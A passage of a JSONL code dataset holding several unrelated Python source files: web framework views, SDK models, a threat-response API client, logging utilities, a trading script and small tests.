data[\"include_js\"]:\n\t\t\twith open(os.path.join(redapp.local.sites_path, path) ,\"r\") as f:\n\t\t\t\tassets[0][\"data\"] = assets[0][\"data\"] + \"\\n\" + unicode(f.read(), \"utf-8\")\n\n\t\tfor path in data[\"include_css\"]:\n\t\t\twith open(os.path.join(redapp.local.sites_path, path) ,\"r\") as f:\n\t\t\t\tassets[1][\"data\"] = assets[1][\"data\"] + \"\\n\" + unicode(f.read(), \"utf-8\")\n\n\treturn {\n\t\t\"build_version\": data[\"build_version\"],\n\t\t\"boot\": data[\"boot\"],\n\t\t\"assets\": assets\n\t}\n\ndef get_build_version():\n\treturn str(os.path.getmtime(os.path.join(redapp.local.sites_path, \"assets\", \"js\",\n\t\t\t\"desk.min.js\")))\n","sub_path":"redapp/templates/pages/desk.py","file_name":"desk.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"283011114","text":"from ..base import API\n\n\nclass ReferAPI(API):\n\n def observables(self, payload):\n \"\"\"\n https://visibility.amp.cisco.com/iroh/iroh-enrich/index.html#!/Refer/post_iroh_iroh_enrich_refer_observables\n \"\"\"\n\n response = self._request.post(\n '/iroh/iroh-enrich/refer/observables',\n json=payload,\n )\n response.raise_for_status()\n return 
response.json()\n","sub_path":"threatresponse/api/enrich/refer.py","file_name":"refer.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"447918038","text":"import contextlib\nimport datetime\nimport unittest\n\nimport mock\nimport pytz\n\nfrom greenpithumb import camera_manager\n\n\nclass TestCameraManager(unittest.TestCase):\n\n def test_save_photo(self):\n folder_path = 'C:/Users/Jeet/'\n mock_local_clock = mock.Mock()\n mock_camera = mock.Mock()\n mock_local_clock.now.return_value = datetime.datetime(\n 2016, 7, 23, 10, 51, 9, 928000, tzinfo=pytz.utc)\n with contextlib.closing(\n camera_manager.CameraManager(folder_path, mock_local_clock,\n mock_camera)) as manager:\n manager.save_photo()\n mock_camera.capture.assert_called_once_with(\n 'C:/Users/Jeet/2016-07-23T10-51-09.928000+00-00.jpg')\n mock_camera.close.assert_called()\n","sub_path":"tests/test_camera_manager.py","file_name":"test_camera_manager.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"542535608","text":"from typing import Sequence, Iterable\n\nfrom progress_checkpoint.common import AsyncCheckpoint\n\n\nasync def with_progress_async(seq: Iterable, checkpoint: AsyncCheckpoint, size=None, status=None, div=1):\n await checkpoint(0, status or '')\n if size is None:\n if not isinstance(seq, Sequence):\n seq = list(seq)\n size = len(seq)\n\n for i, e in enumerate(seq):\n yield e\n\n if i % div == 0:\n await checkpoint(i / size, status)\n\n\nasync def dummy_checkpoint_async(progress, status=None):\n return\n","sub_path":"progress_checkpoint/async.py","file_name":"async.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"328357129","text":"import sys\nimport logging\nimport structlog\nimport importlib\nimport base64\nimport binascii\n\nfrom six.moves import urllib\n\nfrom .exceptions import InvalidAuthHeader\n\nlog = structlog.getLogger(__name__)\n\n\ndef get_path_and_address(domain, address):\n parsed = urllib.parse.urlparse(address)\n\n if parsed.scheme:\n return None, address\n else:\n return address, domain + address\n\n\ndef import_class(module_class_name):\n module_name, _, class_name = module_class_name.rpartition('.')\n module = importlib.import_module(module_name)\n return getattr(module, class_name)\n\n\ndef initialize_api(api_config):\n class_name = api_config['class']\n cls = import_class(class_name)\n params = api_config.get('parameters', None)\n\n if params:\n instance = cls(**params)\n else:\n instance = cls()\n\n log.info(\"api.initialized\", api=class_name)\n\n return instance\n\n\ndef parse_basic_auth_token(token):\n try:\n value = base64.b64decode(token)\n except (TypeError, binascii.Error):\n raise InvalidAuthHeader(\"Can't decode Basic Auth header value\")\n\n try:\n value = value.decode('utf-8')\n username, password = value.split(':', 1)\n return (username, password)\n except ValueError:\n raise InvalidAuthHeader(\"Invalid Basic Auth header value\")\n\n\nclass PlainRenderer(object):\n\n def __call__(self, logger, name, event_dict):\n pairs = ', '.join(['%s=%s' % (k, v) for k, v in event_dict.items()])\n return (\n '{timestamp} [{logger}] {level}: {event} {{{pairs}}}'\n .format(pairs=pairs, **event_dict))\n\n\ndef configure_logging(logging_levels, plain=False):\n\n _remove_all_existing_log_handlers()\n\n renderer = (\n 
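            # Descriptive note (not in the original source): 'plain' selects
            # the human-readable PlainRenderer defined above; otherwise events
            # are rendered as JSON via structlog's JSONRenderer.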
PlainRenderer() if plain else\n structlog.processors.JSONRenderer())\n\n structlog.configure(\n processors=[\n structlog.stdlib.filter_by_level,\n structlog.stdlib.add_logger_name,\n structlog.stdlib.add_log_level,\n structlog.stdlib.PositionalArgumentsFormatter(),\n structlog.processors.TimeStamper(fmt='iso'),\n structlog.processors.StackInfoRenderer(),\n structlog.processors.format_exc_info,\n renderer\n ],\n context_class=dict,\n logger_factory=structlog.stdlib.LoggerFactory(),\n wrapper_class=structlog.stdlib.BoundLogger,\n cache_logger_on_first_use=True,\n )\n\n handler = logging.StreamHandler(sys.stdout)\n root_logger = logging.getLogger()\n root_logger.addHandler(handler)\n\n for logger, level in logging_levels.items():\n\n if logger.lower() == 'root':\n logger = ''\n\n logging.getLogger(logger).setLevel(level.upper())\n\n\ndef _remove_all_existing_log_handlers():\n for logger in logging.Logger.manager.loggerDict.values():\n if hasattr(logger, 'handlers'):\n del logger.handlers[:]\n\n root_logger = logging.getLogger()\n del root_logger.handlers[:]\n","sub_path":"opentaxii/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"596165743","text":"# -*- coding: utf-8 -*-\nfrom guillotina.addons import Addon\nfrom guillotina.interfaces import ILayers\nfrom guillotina import configure\n\nCMS_LAYER = 'guillotina_cms.interfaces.ICMSLayer'\n\n\n@configure.addon(\n name='cms',\n title='Guillotina CMS')\nclass CMSAddon(Addon):\n\n @classmethod\n async def install(cls, container, request):\n registry = request.container_settings\n registry.for_interface(ILayers)['active_layers'] |= {\n CMS_LAYER\n }\n registry._p_register()\n\n @classmethod\n def uninstall(cls, site, request):\n registry = request.container_settings\n registry.for_interface(ILayers)['active_layers'] -= {\n CMS_LAYER\n }\n registry._p_register()","sub_path":"guillotina_cms/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"130520407","text":"import sounddevice\nfrom scipy.io.wavfile import write\nfrom tkinter import *\nimport os\n\ndef recorder():\n#\tpath = \"/root/Music/\"\n\ttry:\n\t\tfs = 44100\n\t\tsecond = 10\n\n\t\tprint(\"recording start......\")\n\n\t\trecord_voice = sounddevice.rec(int(second * fs),samplerate=fs,channels=2)\n\t\tsounddevice.wait()\n\t\twrite(\"outss.wav\",fs,record_voice)\n\t#\tos.mkdir(path)\n\t#\tprint(\"path created\")\n\texcept Exception as e:\n\t\tprint(e)\n\n\n\nmain=Tk()\nmain.title(\"audio recorder\")\nmain.geometry(\"350x300\")\n\n\nbutton = Button(main,text=\"Start Recording\", font=(\"verdana,18\"),padx=14,pady=14,relief=\"ridge\",command=recorder)\nbutton.pack(side=TOP,pady=18)\n\nbutton1 = Button(main,text=\"Stop\", font=(\"verdana, 18\"),padx=18,pady=18,relief=\"ridge\",command=quit)\nbutton1.pack(side=TOP,pady=18)\nmain.mainloop()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"2776035","text":"from rest_framework import serializers\nfrom ..models.Tweet import Tweet\nfrom ElasticSearchPkg.TweetMappingModel import TweetMapping\n\nfrom emoji import UNICODE_EMOJI\n\n\ndef remove_emoji(src_str):\n return ''.join(c for c in src_str if c not in UNICODE_EMOJI)\n\n\nclass 
TweetSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Tweet\n fields = ('id', 'text', 'user_name', 'favorite_count', 'retweet_count',\n 'coordinates', 'geo', 'entities', 'source', 'place')\n\n def create(self, validated_data):\n # trim emoji\n user_name = remove_emoji(validated_data.pop('user_name'))\n text = remove_emoji(validated_data.pop('text'))\n\n tweet = Tweet.objects.create(**validated_data, text=text, user_name=user_name)\n\n # Create a log document\n mix = TweetMapping(\n id=tweet.id,\n user_name=tweet.user_name,\n text=tweet.text,\n favorite_count=tweet.favorite_count,\n retweet_count=tweet.retweet_count,\n coordinates=tweet.coordinates,\n geo=tweet.geo,\n place=tweet.place,\n source=tweet.source,\n created_at=tweet.created_at,\n updated_at=tweet.updated_at\n )\n mix.meta.id = tweet.id\n mix.save()\n\n return tweet\n","sub_path":"DisasterAPI/serializers/TweetSerializer.py","file_name":"TweetSerializer.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"370355850","text":"from django.shortcuts import get_object_or_404, render\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic import (\n ListView, DetailView,\n CreateView, UpdateView, DeleteView\n)\n\n\nfrom . import models\n\n\ndef song_list(request):\n songs = models.Song.objects.all()\n return render(request, 'song_list.html', {'songs': songs})\n\n\n#View for List of all Songs in Database\nclass SongListView(ListView):\n context_object_name = 'songs'\n model = models.Song\n\n# Create Views for full CRUD capabilities\n\n#View for Details of Song\nclass SongDetailView(DetailView):\n model = models.Song\n\n#View for Adding Song\nclass SongCreateView(CreateView):\n fields = ('title', 'artist', 'composition_date')\n model = models.Song\n\n#View for Updating Song Already in Database\nclass SongUpdateView(UpdateView):\n fields = ('title', 'artist', 'composition_date')\n model = models.Song\n\n#View for Deleting a Song from the Database\n#When successful, reverse_lazy returns user to ListView\nclass SongDeleteView(DeleteView):\n model = models.Song\n success_url = reverse_lazy(\"songs:list\")\n","sub_path":"songs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"8195541","text":"import datetime\n\nfrom collections import namedtuple\n\nBarsAnalysis = namedtuple('BarsAnalysis', 'decision close high1 low1 high2 low2')\n\n\nclass TradeData:\n profit_loss: float = 0\n position: int = 0\n price: float = None\n stop_loss: float = None\n\n\nclass Bar(object):\n def __init__(self, barline: str):\n fields = [x.strip() for x in barline.split(',')]\n try:\n self.date = datetime.datetime.strptime(fields[0][6:], '%Y%m%d %H:%M:%S')\n except:\n print(barline)\n raise ValueError\n self.open = float(fields[1].split(':')[1])\n self.high = float(fields[2].split(':')[1])\n self.low = float(fields[3].split(':')[1])\n self.close = float(fields[4].split(':')[1])\n self.volume = float(fields[5].split(':')[1])\n self.average = float(fields[6].split(':')[1])\n self.barCount = int(fields[7].split(':')[1])\n\n def __str__(self):\n return \"Date: %s, Open: %f, High: %f, Low: %f, Close: %f, Volume: %d, Average: %f, BarCount: %d\" % (\n self.date, self.open, self.high,\n self.low, self.close, self.volume, self.average, self.barCount)\n\n\nclass GroupBar:\n def __init__(self, bars: [Bar]):\n self.high 
= max([b.high for b in bars])\n self.low = min([b.low for b in bars])\n self.open = bars[0].open\n self.close = bars[-1].close\n\n\ndef analyzeBars(bars: [Bar], size=5):\n b1 = GroupBar(bars[:size])\n b2 = GroupBar(bars[size:])\n if (b2.high > b1.high) and (b2.low > b1.low) and b2.close > b2.open:\n decision = 'BUY'\n elif (b2.high < b1.high) and (b2.low < b1.low) and b2.close < b2.open:\n decision = \"SELL\"\n else:\n decision = 'HOLD'\n return (decision, b1, b2)\n\n\ndef trade(bars: [Bar]):\n decision, bar1, bar2 = analyzeBars(bars)\n\n if TradeData.position == 0:\n if decision == 'BUY':\n openLongPosition(bar2)\n elif decision == 'SELL':\n openShortPosition(bar2)\n elif decision == 'HOLD':\n pass\n else:\n raise ValueError('Unknown decision', decision)\n\n elif TradeData.position > 0:\n if decision == 'SELL':\n reverseLongToShort(bar2)\n elif bar2.close < TradeData.stop_loss:\n closeLongPosition(bar2)\n\n\n else: # TradeData.position < 0\n if decision == 'BUY':\n reverseShortToLong(bar2)\n elif bar2.close > TradeData.stop_loss:\n closeShortPosition(bar2)\n\n\ndef openLongPosition(bar2: GroupBar):\n print('Open Long')\n TradeData.position = 1\n TradeData.stop_loss = bar2.low\n\n\ndef openShortPosition(bar2: GroupBar):\n print('Open Short')\n TradeData.position = -1\n TradeData.stop_loss = bar2.high\n\n\ndef closeLongPosition(bar2: GroupBar):\n print(\"Close Long\")\n TradeData.position = 0\n TradeData.stop_loss = None\n\n\ndef closeShortPosition(bar2: GroupBar):\n print(\"Close Short\")\n TradeData.position = 0\n TradeData.stop_loss = None\n\n\ndef reverseLongToShort(bar2: GroupBar):\n print(\"Reverse Long to Short\")\n TradeData.position = -1\n TradeData.stop_loss = bar2.high\n\n\ndef reverseShortToLong(bar2: GroupBar):\n print(\"Reverse Short to Long\")\n TradeData.position = 1\n TradeData.stop_loss = bar2.low\n\n\nbars_filename = \"../bars0702.txt\"\nwith open(bars_filename, 'r') as barfile:\n bars = []\n line = barfile.readline()\n last_bar = Bar(line)\n last_time = last_bar.date.time()\n bars.append(last_bar)\n line = barfile.readline()\n while line != \"\":\n this_bar = Bar(line)\n this_time = this_bar.date.time()\n if this_time > last_time:\n bars.append(this_bar)\n else:\n # print(f'Got {len(bars)} bars')\n # print(bars[0].date.time(), bars[-1].date.time())\n trade(bars)\n bars.clear()\n bars.append(this_bar)\n last_bar = this_bar\n last_time = this_bar.date.time()\n line = barfile.readline()\n\nprint(f'Profit/Loss = {TradeData.profit_loss}')\n","sub_path":"newprocess.py","file_name":"newprocess.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"167286146","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.sdk_response import SdkResponse\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass ImportFunctionResponse(SdkResponse):\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'func_urn': 'str',\n 'func_name': 'str',\n 'domain_id': 'str',\n 'namespace': 'str',\n 'project_name': 'str',\n 'package': 'str',\n 'runtime': 'str',\n 'timeout': 'int',\n 'handler': 'str',\n 'memory_size': 'int',\n 'gpu_memory': 'int',\n 'cpu': 'int',\n 'code_type': 'str',\n 'code_url': 'str',\n 'code_filename': 'str',\n 'code_size': 'int',\n 'user_data': 
'str',\n 'digest': 'str',\n 'version': 'str',\n 'image_name': 'str',\n 'xrole': 'str',\n 'app_xrole': 'str',\n 'description': 'str',\n 'version_description': 'str',\n 'last_modified': 'datetime',\n 'func_vpc': 'FuncVpc',\n 'depend_list': 'list[str]',\n 'depend_version_list': 'list[str]',\n 'strategy_config': 'StrategyConfig',\n 'extend_config': 'str',\n 'initializer_handler': 'str',\n 'initializer_timeout': 'int',\n 'enterprise_project_id': 'str'\n }\n\n attribute_map = {\n 'func_urn': 'func_urn',\n 'func_name': 'func_name',\n 'domain_id': 'domain_id',\n 'namespace': 'namespace',\n 'project_name': 'project_name',\n 'package': 'package',\n 'runtime': 'runtime',\n 'timeout': 'timeout',\n 'handler': 'handler',\n 'memory_size': 'memory_size',\n 'gpu_memory': 'gpu_memory',\n 'cpu': 'cpu',\n 'code_type': 'code_type',\n 'code_url': 'code_url',\n 'code_filename': 'code_filename',\n 'code_size': 'code_size',\n 'user_data': 'user_data',\n 'digest': 'digest',\n 'version': 'version',\n 'image_name': 'image_name',\n 'xrole': 'xrole',\n 'app_xrole': 'app_xrole',\n 'description': 'description',\n 'version_description': 'version_description',\n 'last_modified': 'last_modified',\n 'func_vpc': 'func_vpc',\n 'depend_list': 'depend_list',\n 'depend_version_list': 'depend_version_list',\n 'strategy_config': 'strategy_config',\n 'extend_config': 'extend_config',\n 'initializer_handler': 'initializer_handler',\n 'initializer_timeout': 'initializer_timeout',\n 'enterprise_project_id': 'enterprise_project_id'\n }\n\n def __init__(self, func_urn=None, func_name=None, domain_id=None, namespace=None, project_name=None, package=None, runtime=None, timeout=None, handler=None, memory_size=None, gpu_memory=None, cpu=None, code_type=None, code_url=None, code_filename=None, code_size=None, user_data=None, digest=None, version=None, image_name=None, xrole=None, app_xrole=None, description=None, version_description=None, last_modified=None, func_vpc=None, depend_list=None, depend_version_list=None, strategy_config=None, extend_config=None, initializer_handler=None, initializer_timeout=None, enterprise_project_id=None):\n \"\"\"ImportFunctionResponse\n\n The model defined in huaweicloud sdk\n\n :param func_urn: 函数的URN(Uniform Resource Name),唯一标识函数。\n :type func_urn: str\n :param func_name: 函数名称。\n :type func_name: str\n :param domain_id: 域名id。\n :type domain_id: str\n :param namespace: 租户的project id。\n :type namespace: str\n :param project_name: 租户的project name。\n :type project_name: str\n :param package: 函数所属的分组Package,用于用户针对函数的自定义分组。\n :type package: str\n :param runtime: FunctionGraph函数的执行环境 Python2.7: Python语言2.7版本。 Python3.6: Pyton语言3.6版本。 Python3.9: Python语言3.9版本。 Go1.8: Go语言1.8版本。 Go1.x: Go语言1.x版本。 Java8: Java语言8版本。 Java11: Java语言11版本。 Node.js6.10: Nodejs语言6.10版本。 Node.js8.10: Nodejs语言8.10版本。 Node.js10.16: Nodejs语言10.16版本。 Node.js12.13: Nodejs语言12.13版本。 Node.js14.18: Nodejs语言14.18版本。 C#(.NET Core 2.0): C#语言2.0版本。 C#(.NET Core 2.1): C#语言2.1版本。 C#(.NET Core 3.1): C#语言3.1版本。 Custom: 自定义运行时。 PHP7.3: Php语言7.3版本。 http: HTTP函数。\n :type runtime: str\n :param timeout: 函数执行超时时间,超时函数将被强行停止,范围3~900秒,可以通过白名单配置延长到12小时,具体可以咨询华为云函数工作流服务进行配置\n :type timeout: int\n :param handler: 函数执行入口 规则:xx.xx,必须包含“. 
” 举例:对于node.js函数:myfunction.handler,则表示函数的文件名为myfunction.js,执行的入口函数名为handler。\n :type handler: str\n :param memory_size: 函数消耗的内存。 单位M。 取值范围为:128、256、512、768、1024、1280、1536、1792、2048、2560、3072、3584、4096。 最小值为128,最大值为4096。\n :type memory_size: int\n :param gpu_memory: 函数消耗的显存,只支持自定义运行时与自定义镜像函数配置GPU。 单位MB。 取值范围为:1024、2048、3072、4096、5120、6144、7168、8192、9216、10240、11264、12288、13312、14336、15360、16384。 最小值为1024,最大值为16384。\n :type gpu_memory: int\n :param cpu: 函数占用的cpu资源。 单位为millicore(1 core=1000 millicores)。 取值与MemorySize成比例,默认是128M内存占0.1个核(100 millicores)。 函数占用的CPU为基础CPU:200 millicores,再加上内存按比例占用的CPU,计算方法:内存/128 *100 + 200。\n :type cpu: int\n :param code_type: 函数代码类型,取值有4种。 inline: UI在线编辑代码。 zip: 函数代码为zip包。 obs: 函数代码来源于obs存储。 jar: 函数代码为jar包,主要针对Java函数。\n :type code_type: str\n :param code_url: 当CodeType为obs时,该值为函数代码包在OBS上的地址,CodeType为其他值时,该字段为空。\n :type code_url: str\n :param code_filename: 函数的文件名,当CodeType为jar/zip时必须提供该字段,inline和obs不需要提供。\n :type code_filename: str\n :param code_size: 函数大小,单位:字节。\n :type code_size: int\n :param user_data: 用户自定义的name/value信息。 在函数中使用的参数。 举例:如函数要访问某个主机,可以设置自定义参数:Host={host_ip},最多定义20个,总长度不超过4KB。\n :type user_data: str\n :param digest: 函数代码SHA512 hash值,用于判断函数是否变化。\n :type digest: str\n :param version: 函数版本号,由系统自动生成,规则:vYYYYMMDD-HHMMSS(v+年月日-时分秒)。\n :type version: str\n :param image_name: 函数版本的内部标识。\n :type image_name: str\n :param xrole: 函数使用的权限委托名称,需要IAM支持,并在IAM界面创建委托,当函数需要访问其他服务时,必须提供该字段。\n :type xrole: str\n :param app_xrole: 函数app使用的权限委托名称,需要IAM支持,并在IAM界面创建委托,当函数需要访问其他服务时,必须提供该字段。\n :type app_xrole: str\n :param description: 函数描述。\n :type description: str\n :param version_description: 函数版本描述。\n :type version_description: str\n :param last_modified: 函数最后一次更新时间。\n :type last_modified: datetime\n :param func_vpc: \n :type func_vpc: :class:`huaweicloudsdkfunctiongraph.v2.FuncVpc`\n :param depend_list: 依赖id列表\n :type depend_list: list[str]\n :param depend_version_list: 依赖版本id列表\n :type depend_version_list: list[str]\n :param strategy_config: \n :type strategy_config: :class:`huaweicloudsdkfunctiongraph.v2.StrategyConfig`\n :param extend_config: 函数扩展配置。\n :type extend_config: str\n :param initializer_handler: 函数初始化入口,规则:xx.xx,必须包含“. 
���。 举例:对于node.js函数:myfunction.initializer,则表示函数的文件名为myfunction.js,初始化的入口函数名为initializer。\n :type initializer_handler: str\n :param initializer_timeout: 初始化超时时间,超时函数将被强行停止,范围1~300秒。\n :type initializer_timeout: int\n :param enterprise_project_id: 企业项目ID,在企业用户创建函数时必填。\n :type enterprise_project_id: str\n \"\"\"\n \n super(ImportFunctionResponse, self).__init__()\n\n self._func_urn = None\n self._func_name = None\n self._domain_id = None\n self._namespace = None\n self._project_name = None\n self._package = None\n self._runtime = None\n self._timeout = None\n self._handler = None\n self._memory_size = None\n self._gpu_memory = None\n self._cpu = None\n self._code_type = None\n self._code_url = None\n self._code_filename = None\n self._code_size = None\n self._user_data = None\n self._digest = None\n self._version = None\n self._image_name = None\n self._xrole = None\n self._app_xrole = None\n self._description = None\n self._version_description = None\n self._last_modified = None\n self._func_vpc = None\n self._depend_list = None\n self._depend_version_list = None\n self._strategy_config = None\n self._extend_config = None\n self._initializer_handler = None\n self._initializer_timeout = None\n self._enterprise_project_id = None\n self.discriminator = None\n\n if func_urn is not None:\n self.func_urn = func_urn\n if func_name is not None:\n self.func_name = func_name\n if domain_id is not None:\n self.domain_id = domain_id\n if namespace is not None:\n self.namespace = namespace\n if project_name is not None:\n self.project_name = project_name\n if package is not None:\n self.package = package\n if runtime is not None:\n self.runtime = runtime\n if timeout is not None:\n self.timeout = timeout\n if handler is not None:\n self.handler = handler\n if memory_size is not None:\n self.memory_size = memory_size\n if gpu_memory is not None:\n self.gpu_memory = gpu_memory\n if cpu is not None:\n self.cpu = cpu\n if code_type is not None:\n self.code_type = code_type\n if code_url is not None:\n self.code_url = code_url\n if code_filename is not None:\n self.code_filename = code_filename\n if code_size is not None:\n self.code_size = code_size\n if user_data is not None:\n self.user_data = user_data\n if digest is not None:\n self.digest = digest\n if version is not None:\n self.version = version\n if image_name is not None:\n self.image_name = image_name\n if xrole is not None:\n self.xrole = xrole\n if app_xrole is not None:\n self.app_xrole = app_xrole\n if description is not None:\n self.description = description\n if version_description is not None:\n self.version_description = version_description\n if last_modified is not None:\n self.last_modified = last_modified\n if func_vpc is not None:\n self.func_vpc = func_vpc\n if depend_list is not None:\n self.depend_list = depend_list\n if depend_version_list is not None:\n self.depend_version_list = depend_version_list\n if strategy_config is not None:\n self.strategy_config = strategy_config\n if extend_config is not None:\n self.extend_config = extend_config\n if initializer_handler is not None:\n self.initializer_handler = initializer_handler\n if initializer_timeout is not None:\n self.initializer_timeout = initializer_timeout\n if enterprise_project_id is not None:\n self.enterprise_project_id = enterprise_project_id\n\n @property\n def func_urn(self):\n \"\"\"Gets the func_urn of this ImportFunctionResponse.\n\n 函数的URN(Uniform Resource Name),唯一标识函数。\n\n :return: The func_urn of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return 
self._func_urn\n\n @func_urn.setter\n def func_urn(self, func_urn):\n \"\"\"Sets the func_urn of this ImportFunctionResponse.\n\n 函数的URN(Uniform Resource Name),唯一标识函数。\n\n :param func_urn: The func_urn of this ImportFunctionResponse.\n :type func_urn: str\n \"\"\"\n self._func_urn = func_urn\n\n @property\n def func_name(self):\n \"\"\"Gets the func_name of this ImportFunctionResponse.\n\n 函数名称。\n\n :return: The func_name of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._func_name\n\n @func_name.setter\n def func_name(self, func_name):\n \"\"\"Sets the func_name of this ImportFunctionResponse.\n\n 函数名称。\n\n :param func_name: The func_name of this ImportFunctionResponse.\n :type func_name: str\n \"\"\"\n self._func_name = func_name\n\n @property\n def domain_id(self):\n \"\"\"Gets the domain_id of this ImportFunctionResponse.\n\n 域名id。\n\n :return: The domain_id of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._domain_id\n\n @domain_id.setter\n def domain_id(self, domain_id):\n \"\"\"Sets the domain_id of this ImportFunctionResponse.\n\n 域名id。\n\n :param domain_id: The domain_id of this ImportFunctionResponse.\n :type domain_id: str\n \"\"\"\n self._domain_id = domain_id\n\n @property\n def namespace(self):\n \"\"\"Gets the namespace of this ImportFunctionResponse.\n\n 租户的project id。\n\n :return: The namespace of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._namespace\n\n @namespace.setter\n def namespace(self, namespace):\n \"\"\"Sets the namespace of this ImportFunctionResponse.\n\n 租户的project id。\n\n :param namespace: The namespace of this ImportFunctionResponse.\n :type namespace: str\n \"\"\"\n self._namespace = namespace\n\n @property\n def project_name(self):\n \"\"\"Gets the project_name of this ImportFunctionResponse.\n\n 租户的project name。\n\n :return: The project_name of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._project_name\n\n @project_name.setter\n def project_name(self, project_name):\n \"\"\"Sets the project_name of this ImportFunctionResponse.\n\n 租户的project name。\n\n :param project_name: The project_name of this ImportFunctionResponse.\n :type project_name: str\n \"\"\"\n self._project_name = project_name\n\n @property\n def package(self):\n \"\"\"Gets the package of this ImportFunctionResponse.\n\n 函数所属的分组Package,用于用户针对函数的自定义分组。\n\n :return: The package of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._package\n\n @package.setter\n def package(self, package):\n \"\"\"Sets the package of this ImportFunctionResponse.\n\n 函数所属的分组Package,用于用户针对函数的自定义分组。\n\n :param package: The package of this ImportFunctionResponse.\n :type package: str\n \"\"\"\n self._package = package\n\n @property\n def runtime(self):\n \"\"\"Gets the runtime of this ImportFunctionResponse.\n\n FunctionGraph函数的执行环境 Python2.7: Python语言2.7版本。 Python3.6: Pyton语言3.6版本。 Python3.9: Python语言3.9版本。 Go1.8: Go语言1.8版本。 Go1.x: Go语言1.x版本。 Java8: Java语言8版本。 Java11: Java语言11版本。 Node.js6.10: Nodejs语言6.10版本。 Node.js8.10: Nodejs语言8.10版本。 Node.js10.16: Nodejs语言10.16版本。 Node.js12.13: Nodejs语言12.13版本。 Node.js14.18: Nodejs语言14.18版本。 C#(.NET Core 2.0): C#语言2.0版本。 C#(.NET Core 2.1): C#语言2.1版本。 C#(.NET Core 3.1): C#语言3.1版本。 Custom: 自定义运行时。 PHP7.3: Php语言7.3版本。 http: HTTP函数。\n\n :return: The runtime of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._runtime\n\n @runtime.setter\n def runtime(self, runtime):\n \"\"\"Sets the runtime of this ImportFunctionResponse.\n\n FunctionGraph函数的执行环境 Python2.7: 
Python语言2.7版本。 Python3.6: Pyton语言3.6版本。 Python3.9: Python语言3.9版本。 Go1.8: Go语言1.8版本。 Go1.x: Go语言1.x版本。 Java8: Java语言8版本。 Java11: Java语言11版本。 Node.js6.10: Nodejs语言6.10版本。 Node.js8.10: Nodejs语言8.10版本。 Node.js10.16: Nodejs语言10.16版本。 Node.js12.13: Nodejs语言12.13版本。 Node.js14.18: Nodejs语言14.18版本。 C#(.NET Core 2.0): C#语言2.0版本。 C#(.NET Core 2.1): C#语言2.1版本。 C#(.NET Core 3.1): C#语言3.1版本。 Custom: 自定义运行时。 PHP7.3: Php语言7.3版本。 http: HTTP函数。\n\n :param runtime: The runtime of this ImportFunctionResponse.\n :type runtime: str\n \"\"\"\n self._runtime = runtime\n\n @property\n def timeout(self):\n \"\"\"Gets the timeout of this ImportFunctionResponse.\n\n 函数执行超时时间,超时函数将被强行停止,范围3~900秒,可以通过白名单配置延长到12小时,具体可以咨询华为云函数工作流服务进行���置\n\n :return: The timeout of this ImportFunctionResponse.\n :rtype: int\n \"\"\"\n return self._timeout\n\n @timeout.setter\n def timeout(self, timeout):\n \"\"\"Sets the timeout of this ImportFunctionResponse.\n\n 函数执行超时时间,超时函数将被强行停止,范围3~900秒,可以通过白名单配置延长到12小时,具体可以咨询华为云函数工作流服务进行配置\n\n :param timeout: The timeout of this ImportFunctionResponse.\n :type timeout: int\n \"\"\"\n self._timeout = timeout\n\n @property\n def handler(self):\n \"\"\"Gets the handler of this ImportFunctionResponse.\n\n 函数执行入口 规则:xx.xx,必须包含“. ” 举例:对于node.js函数:myfunction.handler,则表示函数的文件名为myfunction.js,执行的入口函数名为handler。\n\n :return: The handler of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._handler\n\n @handler.setter\n def handler(self, handler):\n \"\"\"Sets the handler of this ImportFunctionResponse.\n\n 函数执行入口 规则:xx.xx,必须包含“. ” 举例:对于node.js函数:myfunction.handler,则表示函数的文件名为myfunction.js,执行的入口函数名为handler。\n\n :param handler: The handler of this ImportFunctionResponse.\n :type handler: str\n \"\"\"\n self._handler = handler\n\n @property\n def memory_size(self):\n \"\"\"Gets the memory_size of this ImportFunctionResponse.\n\n 函数消耗的内存。 单位M。 取值范围为:128、256、512、768、1024、1280、1536、1792、2048、2560、3072、3584、4096。 最小值为128,最大值为4096。\n\n :return: The memory_size of this ImportFunctionResponse.\n :rtype: int\n \"\"\"\n return 